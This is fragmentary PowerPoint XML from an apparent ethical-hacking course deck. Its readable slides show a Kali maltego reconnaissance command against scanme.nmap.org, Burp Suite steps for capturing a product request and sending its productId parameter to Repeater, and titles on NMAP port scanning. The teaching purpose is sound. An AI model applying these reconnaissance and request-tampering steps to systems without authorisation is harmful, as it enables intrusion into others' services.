                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>dr.pandey@ieee.org</a:t>
            </a:r>
            <a:endParaRPr sz="900" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="33333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33332"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>3Sk\(AAK}%tX~aF6MnQPf3p4Ag4Gs(9@</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r>
              <a:rPr lang="en"/>
              <a:t>Lab Experiment No 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="Google Shape;248;p40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8260800" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1A1A1A"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>root@kali:~# maltego scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>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sz="1400">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="249" name="Google Shape;249;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1493200"/>
            <a:ext cx="9144000" cy="341639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21"/>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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="810" name="Google Shape;810;p121"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="22635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SzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="811" name="Google Shape;811;p121"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="351788" y="573281"/>
            <a:ext cx="8455238" cy="447926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122"/>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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="818" name="Google Shape;818;p122"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="22635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SzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="819" name="Google Shape;819;p122"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="111057" y="573282"/>
            <a:ext cx="8921889" cy="42237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23"/>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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="826" name="Google Shape;826;p123"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="22635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SzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="827" name="Google Shape;827;p123"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="363919" y="162825"/>
            <a:ext cx="8265730" cy="49149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24"/>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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="834" name="Google Shape;834;p124"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="22635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SzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="835" name="Google Shape;835;p124"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="396478" y="396478"/>
            <a:ext cx="8351044" cy="435054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25"/>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145454"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="29629"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Step 2: Study the HTTP history</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="1">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="50000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="842" name="Google Shape;842;p125"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266850" y="1124288"/>
            <a:ext cx="8362800" cy="1071600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="5C5C5B"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In Burp, go to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Proxy &gt; HTTP history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> tab. To make this easier to read, keep clicking the header of the leftmost column (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>) until the requests are sorted in descending order. This way, can see the most recent requests at the top.</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="843" name="Google Shape;843;p125"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="611681" y="2195738"/>
            <a:ext cx="8122444" cy="27146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26"/>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145454"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="29629"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Step 3: Identify an interesting request</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="1">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="50000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="850" name="Google Shape;850;p126"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368775" y="1100031"/>
            <a:ext cx="8115300" cy="731700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Notice that each time you access a product page, the browser sends a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>GET /product</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> request with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>productId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> query parameter.</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="851" name="Google Shape;851;p126"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1946025"/>
            <a:ext cx="8801907" cy="30831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27"/>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145454"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="29629"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Step 4: Send the request to Burp Repeater</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="1">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="50000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="858" name="Google Shape;858;p127"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="1112162"/>
            <a:ext cx="8115300" cy="671100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Right-click on any of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>GET /product?productId=[...]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> requests and select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Send to Repeater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="859" name="Google Shape;859;p127"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="987731" y="1642874"/>
            <a:ext cx="6457951" cy="346177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28"/>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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="866" name="Google Shape;866;p128"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="22635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SzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="867" name="Google Shape;867;p128"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="389419" y="106331"/>
            <a:ext cx="8607807" cy="503716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29"/>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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="874" name="Google Shape;874;p129"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="22635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SzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="875" name="Google Shape;875;p129"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514352" y="460969"/>
            <a:ext cx="8285644" cy="44299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30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628775" y="429960"/>
            <a:ext cx="4843500" cy="7275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SzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="882" name="Google Shape;882;p130"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="22635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SzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="883" name="Google Shape;883;p130"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152850" y="182569"/>
            <a:ext cx="8838300" cy="477836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1056</TotalTime>
  <Words>9708</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>1152</Paragraphs>
  <Slides>308</Slides>
  <Notes>259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308</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="323" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Roboto Mono</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Noto Sans Symbols</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Georgia</vt:lpstr>
      <vt:lpstr>Rockwell</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Vapor Trail</vt:lpstr>
      <vt:lpstr> Ethical Hacking</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Lab Experiment No 1</vt:lpstr>
      <vt:lpstr>Lab Experiment No 1</vt:lpstr>
      <vt:lpstr>Lab Experiment No 1</vt:lpstr>
      <vt:lpstr>Lab Experiment No 1</vt:lpstr>
      <vt:lpstr>Lab Experiment No 1</vt:lpstr>
      <vt:lpstr>Lab Experiment No 1</vt:lpstr>
      <vt:lpstr>Lab Experiment No 1</vt:lpstr>
      <vt:lpstr>Lab Experiment No 1</vt:lpstr>
      <vt:lpstr>Lab Experiment No 1</vt:lpstr>
      <vt:lpstr>Lab Experiment No 1</vt:lpstr>
      <vt:lpstr>Lab Experiment No 1</vt:lpstr>
      <vt:lpstr>Lab Experiment No 1</vt:lpstr>
      <vt:lpstr>Lab Experiment No 1</vt:lpstr>
      <vt:lpstr>Lab Experiment No 1</vt:lpstr>
      <vt:lpstr>Lab Experiment No 1: Run Machine, Go to Company Stalker</vt:lpstr>
      <vt:lpstr>Lab Experiment No 1</vt:lpstr>
      <vt:lpstr>Lab Experiment No 1</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Lab Experiment No 2</vt:lpstr>
      <vt:lpstr>Lab Experiment No 2</vt:lpstr>
      <vt:lpstr>Lab Experiment No 2</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Lab Experiment No 3</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Syntax of NMAP Command</vt:lpstr>
      <vt:lpstr>Syntax of NMAP Command</vt:lpstr>
      <vt:lpstr>Port Scanning and Network Scaning using NMAP </vt:lpstr>
      <vt:lpstr>Port Scanning and Network Scaning using NMAP </vt:lpstr>
      <vt:lpstr>Port Scanning and Network Scaning using NMAP </vt:lpstr>
      <vt:lpstr>Port Scanning and Network Scaning using NMAP </vt:lpstr>
